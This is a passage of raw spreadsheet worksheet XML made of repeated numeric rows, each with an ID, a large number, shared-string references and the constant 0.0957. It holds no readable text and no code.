      <c r="C22714" s="2" t="s">
        <v>21938</v>
      </c>
      <c r="D22714" s="2">
        <v>1.0</v>
      </c>
      <c r="E22714" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22714" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22715" ht="15.75" customHeight="1">
      <c r="A22715" s="1">
        <v>14978.0</v>
      </c>
      <c r="B22715" s="2">
        <v>4.1376999E7</v>
      </c>
      <c r="C22715" s="2" t="s">
        <v>21939</v>
      </c>
      <c r="D22715" s="2">
        <v>1.0</v>
      </c>
      <c r="E22715" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22715" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22716" ht="15.75" customHeight="1">
      <c r="A22716" s="1">
        <v>14987.0</v>
      </c>
      <c r="B22716" s="2">
        <v>4.1415715E7</v>
      </c>
      <c r="C22716" s="2" t="s">
        <v>21940</v>
      </c>
      <c r="D22716" s="2">
        <v>1.0</v>
      </c>
      <c r="E22716" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22716" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22717" ht="15.75" customHeight="1">
      <c r="A22717" s="1">
        <v>15247.0</v>
      </c>
      <c r="B22717" s="2">
        <v>4.2284318E7</v>
      </c>
      <c r="C22717" s="2" t="s">
        <v>21941</v>
      </c>
      <c r="D22717" s="2">
        <v>1.0</v>
      </c>
      <c r="E22717" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22717" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22718" ht="15.75" customHeight="1">
      <c r="A22718" s="1">
        <v>15478.0</v>
      </c>
      <c r="B22718" s="2">
        <v>4.3177268E7</v>
      </c>
      <c r="C22718" s="2" t="s">
        <v>21942</v>
      </c>
      <c r="D22718" s="2">
        <v>1.0</v>
      </c>
      <c r="E22718" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22718" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22719" ht="15.75" customHeight="1">
      <c r="A22719" s="1">
        <v>15522.0</v>
      </c>
      <c r="B22719" s="2">
        <v>4.329151E7</v>
      </c>
      <c r="C22719" s="2" t="s">
        <v>21943</v>
      </c>
      <c r="D22719" s="2">
        <v>1.0</v>
      </c>
      <c r="E22719" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22719" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22720" ht="15.75" customHeight="1">
      <c r="A22720" s="1">
        <v>15713.0</v>
      </c>
      <c r="B22720" s="2">
        <v>4.3967815E7</v>
      </c>
      <c r="C22720" s="2" t="s">
        <v>21944</v>
      </c>
      <c r="D22720" s="2">
        <v>1.0</v>
      </c>
      <c r="E22720" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22720" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22721" ht="15.75" customHeight="1">
      <c r="A22721" s="1">
        <v>15965.0</v>
      </c>
      <c r="B22721" s="2">
        <v>4.478792E7</v>
      </c>
      <c r="C22721" s="2" t="s">
        <v>21945</v>
      </c>
      <c r="D22721" s="2">
        <v>1.0</v>
      </c>
      <c r="E22721" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22721" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22722" ht="15.75" customHeight="1">
      <c r="A22722" s="1">
        <v>16171.0</v>
      </c>
      <c r="B22722" s="2">
        <v>4.5634402E7</v>
      </c>
      <c r="C22722" s="2" t="s">
        <v>21946</v>
      </c>
      <c r="D22722" s="2">
        <v>1.0</v>
      </c>
      <c r="E22722" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22722" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22723" ht="15.75" customHeight="1">
      <c r="A22723" s="1">
        <v>16179.0</v>
      </c>
      <c r="B22723" s="2">
        <v>4.5653148E7</v>
      </c>
      <c r="C22723" s="2" t="s">
        <v>21947</v>
      </c>
      <c r="D22723" s="2">
        <v>1.0</v>
      </c>
      <c r="E22723" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22723" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22724" ht="15.75" customHeight="1">
      <c r="A22724" s="1">
        <v>16240.0</v>
      </c>
      <c r="B22724" s="2">
        <v>4.5771669E7</v>
      </c>
      <c r="C22724" s="2" t="s">
        <v>21948</v>
      </c>
      <c r="D22724" s="2">
        <v>1.0</v>
      </c>
      <c r="E22724" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22724" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22725" ht="15.75" customHeight="1">
      <c r="A22725" s="1">
        <v>16369.0</v>
      </c>
      <c r="B22725" s="2">
        <v>4.6150117E7</v>
      </c>
      <c r="C22725" s="2" t="s">
        <v>21949</v>
      </c>
      <c r="D22725" s="2">
        <v>1.0</v>
      </c>
      <c r="E22725" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22725" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22726" ht="15.75" customHeight="1">
      <c r="A22726" s="1">
        <v>16597.0</v>
      </c>
      <c r="B22726" s="2">
        <v>4.7003275E7</v>
      </c>
      <c r="C22726" s="2" t="s">
        <v>21950</v>
      </c>
      <c r="D22726" s="2">
        <v>1.0</v>
      </c>
      <c r="E22726" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22726" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22727" ht="15.75" customHeight="1">
      <c r="A22727" s="1">
        <v>16673.0</v>
      </c>
      <c r="B22727" s="2">
        <v>4.7276002E7</v>
      </c>
      <c r="C22727" s="2" t="s">
        <v>21951</v>
      </c>
      <c r="D22727" s="2">
        <v>1.0</v>
      </c>
      <c r="E22727" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22727" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22728" ht="15.75" customHeight="1">
      <c r="A22728" s="1">
        <v>16897.0</v>
      </c>
      <c r="B22728" s="2">
        <v>4.8072875E7</v>
      </c>
      <c r="C22728" s="2" t="s">
        <v>21952</v>
      </c>
      <c r="D22728" s="2">
        <v>1.0</v>
      </c>
      <c r="E22728" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22728" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22729" ht="15.75" customHeight="1">
      <c r="A22729" s="1">
        <v>17459.0</v>
      </c>
      <c r="B22729" s="2">
        <v>4.9843593E7</v>
      </c>
      <c r="C22729" s="2" t="s">
        <v>21953</v>
      </c>
      <c r="D22729" s="2">
        <v>1.0</v>
      </c>
      <c r="E22729" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22729" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22730" ht="15.75" customHeight="1">
      <c r="A22730" s="1">
        <v>17506.0</v>
      </c>
      <c r="B22730" s="2">
        <v>5.0007339E7</v>
      </c>
      <c r="C22730" s="2" t="s">
        <v>21954</v>
      </c>
      <c r="D22730" s="2">
        <v>1.0</v>
      </c>
      <c r="E22730" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22730" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22731" ht="15.75" customHeight="1">
      <c r="A22731" s="1">
        <v>17540.0</v>
      </c>
      <c r="B22731" s="2">
        <v>5.0135573E7</v>
      </c>
      <c r="C22731" s="2" t="s">
        <v>21955</v>
      </c>
      <c r="D22731" s="2">
        <v>1.0</v>
      </c>
      <c r="E22731" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22731" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22732" ht="15.75" customHeight="1">
      <c r="A22732" s="1">
        <v>17607.0</v>
      </c>
      <c r="B22732" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C22732" s="2" t="s">
        <v>21956</v>
      </c>
      <c r="D22732" s="2">
        <v>1.0</v>
      </c>
      <c r="E22732" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22732" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22733" ht="15.75" customHeight="1">
      <c r="A22733" s="1">
        <v>17765.0</v>
      </c>
      <c r="B22733" s="2">
        <v>5.0737172E7</v>
      </c>
      <c r="C22733" s="2" t="s">
        <v>21957</v>
      </c>
      <c r="D22733" s="2">
        <v>1.0</v>
      </c>
      <c r="E22733" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22733" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22734" ht="15.75" customHeight="1">
      <c r="A22734" s="1">
        <v>17835.0</v>
      </c>
      <c r="B22734" s="2">
        <v>5.0928864E7</v>
      </c>
      <c r="C22734" s="2" t="s">
        <v>21958</v>
      </c>
      <c r="D22734" s="2">
        <v>1.0</v>
      </c>
      <c r="E22734" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22734" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22735" ht="15.75" customHeight="1">
      <c r="A22735" s="1">
        <v>17904.0</v>
      </c>
      <c r="B22735" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C22735" s="2" t="s">
        <v>21959</v>
      </c>
      <c r="D22735" s="2">
        <v>1.0</v>
      </c>
      <c r="E22735" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22735" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22736" ht="15.75" customHeight="1">
      <c r="A22736" s="1">
        <v>17931.0</v>
      </c>
      <c r="B22736" s="2">
        <v>5.123794E7</v>
      </c>
      <c r="C22736" s="2" t="s">
        <v>21960</v>
      </c>
      <c r="D22736" s="2">
        <v>1.0</v>
      </c>
      <c r="E22736" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22736" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22737" ht="15.75" customHeight="1">
      <c r="A22737" s="1">
        <v>18340.0</v>
      </c>
      <c r="B22737" s="2">
        <v>5.2440151E7</v>
      </c>
      <c r="C22737" s="2" t="s">
        <v>21961</v>
      </c>
      <c r="D22737" s="2">
        <v>1.0</v>
      </c>
      <c r="E22737" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22737" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22738" ht="15.75" customHeight="1">
      <c r="A22738" s="1">
        <v>18467.0</v>
      </c>
      <c r="B22738" s="2">
        <v>5.2846381E7</v>
      </c>
      <c r="C22738" s="2" t="s">
        <v>21962</v>
      </c>
      <c r="D22738" s="2">
        <v>1.0</v>
      </c>
      <c r="E22738" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22738" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22739" ht="15.75" customHeight="1">
      <c r="A22739" s="1">
        <v>18737.0</v>
      </c>
      <c r="B22739" s="2">
        <v>5.3732359E7</v>
      </c>
      <c r="C22739" s="2" t="s">
        <v>21963</v>
      </c>
      <c r="D22739" s="2">
        <v>1.0</v>
      </c>
      <c r="E22739" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22739" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22740" ht="15.75" customHeight="1">
      <c r="A22740" s="1">
        <v>18841.0</v>
      </c>
      <c r="B22740" s="2">
        <v>5.396119E7</v>
      </c>
      <c r="C22740" s="2" t="s">
        <v>21964</v>
      </c>
      <c r="D22740" s="2">
        <v>1.0</v>
      </c>
      <c r="E22740" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22740" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22741" ht="15.75" customHeight="1">
      <c r="A22741" s="1">
        <v>18857.0</v>
      </c>
      <c r="B22741" s="2">
        <v>5.3984547E7</v>
      </c>
      <c r="C22741" s="2" t="s">
        <v>21965</v>
      </c>
      <c r="D22741" s="2">
        <v>1.0</v>
      </c>
      <c r="E22741" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22741" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22742" ht="15.75" customHeight="1">
      <c r="A22742" s="1">
        <v>19144.0</v>
      </c>
      <c r="B22742" s="2">
        <v>5.4839127E7</v>
      </c>
      <c r="C22742" s="2" t="s">
        <v>21966</v>
      </c>
      <c r="D22742" s="2">
        <v>1.0</v>
      </c>
      <c r="E22742" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22742" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22743" ht="15.75" customHeight="1">
      <c r="A22743" s="1">
        <v>19649.0</v>
      </c>
      <c r="B22743" s="2">
        <v>5.63224E7</v>
      </c>
      <c r="C22743" s="2" t="s">
        <v>21967</v>
      </c>
      <c r="D22743" s="2">
        <v>1.0</v>
      </c>
      <c r="E22743" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22743" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22744" ht="15.75" customHeight="1">
      <c r="A22744" s="1">
        <v>19899.0</v>
      </c>
      <c r="B22744" s="2">
        <v>5.7323533E7</v>
      </c>
      <c r="C22744" s="2" t="s">
        <v>21968</v>
      </c>
      <c r="D22744" s="2">
        <v>1.0</v>
      </c>
      <c r="E22744" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22744" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22745" ht="15.75" customHeight="1">
      <c r="A22745" s="1">
        <v>20052.0</v>
      </c>
      <c r="B22745" s="2">
        <v>8136150.0</v>
      </c>
      <c r="C22745" s="2" t="s">
        <v>21969</v>
      </c>
      <c r="D22745" s="2">
        <v>1.0</v>
      </c>
      <c r="E22745" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22745" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22746" ht="15.75" customHeight="1">
      <c r="A22746" s="1">
        <v>20098.0</v>
      </c>
      <c r="B22746" s="2">
        <v>9683684.0</v>
      </c>
      <c r="C22746" s="2" t="s">
        <v>21970</v>
      </c>
      <c r="D22746" s="2">
        <v>1.0</v>
      </c>
      <c r="E22746" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22746" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22747" ht="15.75" customHeight="1">
      <c r="A22747" s="1">
        <v>20659.0</v>
      </c>
      <c r="B22747" s="2">
        <v>1.429853E7</v>
      </c>
      <c r="C22747" s="2" t="s">
        <v>21971</v>
      </c>
      <c r="D22747" s="2">
        <v>1.0</v>
      </c>
      <c r="E22747" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22747" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22748" ht="15.75" customHeight="1">
      <c r="A22748" s="1">
        <v>20755.0</v>
      </c>
      <c r="B22748" s="2">
        <v>1.4879319E7</v>
      </c>
      <c r="C22748" s="2" t="s">
        <v>15665</v>
      </c>
      <c r="D22748" s="2">
        <v>1.0</v>
      </c>
      <c r="E22748" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22748" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22749" ht="15.75" customHeight="1">
      <c r="A22749" s="1">
        <v>20784.0</v>
      </c>
      <c r="B22749" s="2">
        <v>1.5068721E7</v>
      </c>
      <c r="C22749" s="2" t="s">
        <v>21416</v>
      </c>
      <c r="D22749" s="2">
        <v>1.0</v>
      </c>
      <c r="E22749" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22749" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22750" ht="15.75" customHeight="1">
      <c r="A22750" s="1">
        <v>21033.0</v>
      </c>
      <c r="B22750" s="2">
        <v>1.7540852E7</v>
      </c>
      <c r="C22750" s="2" t="s">
        <v>21972</v>
      </c>
      <c r="D22750" s="2">
        <v>1.0</v>
      </c>
      <c r="E22750" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22750" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22751" ht="15.75" customHeight="1">
      <c r="A22751" s="1">
        <v>21270.0</v>
      </c>
      <c r="B22751" s="2">
        <v>2.0135746E7</v>
      </c>
      <c r="C22751" s="2" t="s">
        <v>21973</v>
      </c>
      <c r="D22751" s="2">
        <v>1.0</v>
      </c>
      <c r="E22751" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22751" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22752" ht="15.75" customHeight="1">
      <c r="A22752" s="1">
        <v>21588.0</v>
      </c>
      <c r="B22752" s="2">
        <v>2.3928197E7</v>
      </c>
      <c r="C22752" s="2" t="s">
        <v>21974</v>
      </c>
      <c r="D22752" s="2">
        <v>1.0</v>
      </c>
      <c r="E22752" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22752" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22753" ht="15.75" customHeight="1">
      <c r="A22753" s="1">
        <v>22962.0</v>
      </c>
      <c r="B22753" s="2">
        <v>4.9170562E7</v>
      </c>
      <c r="C22753" s="2" t="s">
        <v>21975</v>
      </c>
      <c r="D22753" s="2">
        <v>1.0</v>
      </c>
      <c r="E22753" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22753" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22754" ht="15.75" customHeight="1">
      <c r="A22754" s="1">
        <v>23019.0</v>
      </c>
      <c r="B22754" s="2">
        <v>4.9938529E7</v>
      </c>
      <c r="C22754" s="2" t="s">
        <v>21976</v>
      </c>
      <c r="D22754" s="2">
        <v>1.0</v>
      </c>
      <c r="E22754" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22754" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22755" ht="15.75" customHeight="1">
      <c r="A22755" s="1">
        <v>24000.0</v>
      </c>
      <c r="B22755" s="2">
        <v>9236454.0</v>
      </c>
      <c r="C22755" s="2" t="s">
        <v>21977</v>
      </c>
      <c r="D22755" s="2">
        <v>1.0</v>
      </c>
      <c r="E22755" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22755" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22756" ht="15.75" customHeight="1">
      <c r="A22756" s="1">
        <v>24409.0</v>
      </c>
      <c r="B22756" s="2">
        <v>1.082269E7</v>
      </c>
      <c r="C22756" s="2" t="s">
        <v>21978</v>
      </c>
      <c r="D22756" s="2">
        <v>1.0</v>
      </c>
      <c r="E22756" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22756" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22757" ht="15.75" customHeight="1">
      <c r="A22757" s="1">
        <v>24446.0</v>
      </c>
      <c r="B22757" s="2">
        <v>1.0906975E7</v>
      </c>
      <c r="C22757" s="2" t="s">
        <v>21979</v>
      </c>
      <c r="D22757" s="2">
        <v>1.0</v>
      </c>
      <c r="E22757" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22757" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22758" ht="15.75" customHeight="1">
      <c r="A22758" s="1">
        <v>24754.0</v>
      </c>
      <c r="B22758" s="2">
        <v>1.1815341E7</v>
      </c>
      <c r="C22758" s="2" t="s">
        <v>21980</v>
      </c>
      <c r="D22758" s="2">
        <v>1.0</v>
      </c>
      <c r="E22758" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22758" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22759" ht="15.75" customHeight="1">
      <c r="A22759" s="1">
        <v>24805.0</v>
      </c>
      <c r="B22759" s="2">
        <v>1.2030552E7</v>
      </c>
      <c r="C22759" s="2" t="s">
        <v>21981</v>
      </c>
      <c r="D22759" s="2">
        <v>1.0</v>
      </c>
      <c r="E22759" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22759" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22760" ht="15.75" customHeight="1">
      <c r="A22760" s="1">
        <v>24924.0</v>
      </c>
      <c r="B22760" s="2">
        <v>1.2403768E7</v>
      </c>
      <c r="C22760" s="2" t="s">
        <v>21982</v>
      </c>
      <c r="D22760" s="2">
        <v>1.0</v>
      </c>
      <c r="E22760" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22760" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22761" ht="15.75" customHeight="1">
      <c r="A22761" s="1">
        <v>25388.0</v>
      </c>
      <c r="B22761" s="2">
        <v>1.3691735E7</v>
      </c>
      <c r="C22761" s="2" t="s">
        <v>21983</v>
      </c>
      <c r="D22761" s="2">
        <v>1.0</v>
      </c>
      <c r="E22761" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22761" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22762" ht="15.75" customHeight="1">
      <c r="A22762" s="1">
        <v>26048.0</v>
      </c>
      <c r="B22762" s="2">
        <v>1.5512987E7</v>
      </c>
      <c r="C22762" s="2" t="s">
        <v>21984</v>
      </c>
      <c r="D22762" s="2">
        <v>1.0</v>
      </c>
      <c r="E22762" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22762" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22763" ht="15.75" customHeight="1">
      <c r="A22763" s="1">
        <v>26544.0</v>
      </c>
      <c r="B22763" s="2">
        <v>1.7747143E7</v>
      </c>
      <c r="C22763" s="2" t="s">
        <v>21985</v>
      </c>
      <c r="D22763" s="2">
        <v>1.0</v>
      </c>
      <c r="E22763" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22763" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22764" ht="15.75" customHeight="1">
      <c r="A22764" s="1">
        <v>27157.0</v>
      </c>
      <c r="B22764" s="2">
        <v>2.0808542E7</v>
      </c>
      <c r="C22764" s="2" t="s">
        <v>21986</v>
      </c>
      <c r="D22764" s="2">
        <v>1.0</v>
      </c>
      <c r="E22764" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22764" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22765" ht="15.75" customHeight="1">
      <c r="A22765" s="1">
        <v>27335.0</v>
      </c>
      <c r="B22765" s="2">
        <v>2.1451672E7</v>
      </c>
      <c r="C22765" s="2" t="s">
        <v>21987</v>
      </c>
      <c r="D22765" s="2">
        <v>1.0</v>
      </c>
      <c r="E22765" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22765" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22766" ht="15.75" customHeight="1">
      <c r="A22766" s="1">
        <v>27511.0</v>
      </c>
      <c r="B22766" s="2">
        <v>2.2148134E7</v>
      </c>
      <c r="C22766" s="2" t="s">
        <v>21988</v>
      </c>
      <c r="D22766" s="2">
        <v>1.0</v>
      </c>
      <c r="E22766" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22766" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22767" ht="15.75" customHeight="1">
      <c r="A22767" s="1">
        <v>27938.0</v>
      </c>
      <c r="B22767" s="2">
        <v>2.3808006E7</v>
      </c>
      <c r="C22767" s="2" t="s">
        <v>21989</v>
      </c>
      <c r="D22767" s="2">
        <v>1.0</v>
      </c>
      <c r="E22767" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22767" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22768" ht="15.75" customHeight="1">
      <c r="A22768" s="1">
        <v>28405.0</v>
      </c>
      <c r="B22768" s="2">
        <v>2.6283067E7</v>
      </c>
      <c r="C22768" s="2" t="s">
        <v>21990</v>
      </c>
      <c r="D22768" s="2">
        <v>1.0</v>
      </c>
      <c r="E22768" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22768" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22769" ht="15.75" customHeight="1">
      <c r="A22769" s="1">
        <v>28417.0</v>
      </c>
      <c r="B22769" s="2">
        <v>2.6386382E7</v>
      </c>
      <c r="C22769" s="2" t="s">
        <v>21991</v>
      </c>
      <c r="D22769" s="2">
        <v>1.0</v>
      </c>
      <c r="E22769" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22769" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22770" ht="15.75" customHeight="1">
      <c r="A22770" s="1">
        <v>28436.0</v>
      </c>
      <c r="B22770" s="2">
        <v>2.6485566E7</v>
      </c>
      <c r="C22770" s="2" t="s">
        <v>21992</v>
      </c>
      <c r="D22770" s="2">
        <v>1.0</v>
      </c>
      <c r="E22770" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22770" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22771" ht="15.75" customHeight="1">
      <c r="A22771" s="1">
        <v>28924.0</v>
      </c>
      <c r="B22771" s="2">
        <v>2.9524788E7</v>
      </c>
      <c r="C22771" s="2" t="s">
        <v>21993</v>
      </c>
      <c r="D22771" s="2">
        <v>1.0</v>
      </c>
      <c r="E22771" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22771" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22772" ht="15.75" customHeight="1">
      <c r="A22772" s="1">
        <v>29543.0</v>
      </c>
      <c r="B22772" s="2">
        <v>3.2964083E7</v>
      </c>
      <c r="C22772" s="2" t="s">
        <v>21994</v>
      </c>
      <c r="D22772" s="2">
        <v>1.0</v>
      </c>
      <c r="E22772" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22772" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22773" ht="15.75" customHeight="1">
      <c r="A22773" s="1">
        <v>30096.0</v>
      </c>
      <c r="B22773" s="2">
        <v>3.6451964E7</v>
      </c>
      <c r="C22773" s="2" t="s">
        <v>21995</v>
      </c>
      <c r="D22773" s="2">
        <v>1.0</v>
      </c>
      <c r="E22773" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22773" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22774" ht="15.75" customHeight="1">
      <c r="A22774" s="1">
        <v>31215.0</v>
      </c>
      <c r="B22774" s="2">
        <v>4926389.0</v>
      </c>
      <c r="C22774" s="2" t="s">
        <v>21996</v>
      </c>
      <c r="D22774" s="2">
        <v>1.0</v>
      </c>
      <c r="E22774" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22774" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22775" ht="15.75" customHeight="1">
      <c r="A22775" s="1">
        <v>31219.0</v>
      </c>
      <c r="B22775" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C22775" s="2" t="s">
        <v>21997</v>
      </c>
      <c r="D22775" s="2">
        <v>1.0</v>
      </c>
      <c r="E22775" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22775" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22776" ht="15.75" customHeight="1">
      <c r="A22776" s="1">
        <v>32110.0</v>
      </c>
      <c r="B22776" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C22776" s="2" t="s">
        <v>21998</v>
      </c>
      <c r="D22776" s="2">
        <v>1.0</v>
      </c>
      <c r="E22776" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22776" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22777" ht="15.75" customHeight="1">
      <c r="A22777" s="1">
        <v>32117.0</v>
      </c>
      <c r="B22777" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C22777" s="2" t="s">
        <v>21999</v>
      </c>
      <c r="D22777" s="2">
        <v>1.0</v>
      </c>
      <c r="E22777" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22777" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22778" ht="15.75" customHeight="1">
      <c r="A22778" s="1">
        <v>32451.0</v>
      </c>
      <c r="B22778" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C22778" s="2" t="s">
        <v>22000</v>
      </c>
      <c r="D22778" s="2">
        <v>1.0</v>
      </c>
      <c r="E22778" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22778" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22779" ht="15.75" customHeight="1">
      <c r="A22779" s="1">
        <v>32906.0</v>
      </c>
      <c r="B22779" s="2">
        <v>6396181.0</v>
      </c>
      <c r="C22779" s="2" t="s">
        <v>22001</v>
      </c>
      <c r="D22779" s="2">
        <v>1.0</v>
      </c>
      <c r="E22779" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22779" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22780" ht="15.75" customHeight="1">
      <c r="A22780" s="1">
        <v>33367.0</v>
      </c>
      <c r="B22780" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C22780" s="2" t="s">
        <v>22002</v>
      </c>
      <c r="D22780" s="2">
        <v>1.0</v>
      </c>
      <c r="E22780" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22780" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22781" ht="15.75" customHeight="1">
      <c r="A22781" s="1">
        <v>33374.0</v>
      </c>
      <c r="B22781" s="2">
        <v>7632037.0</v>
      </c>
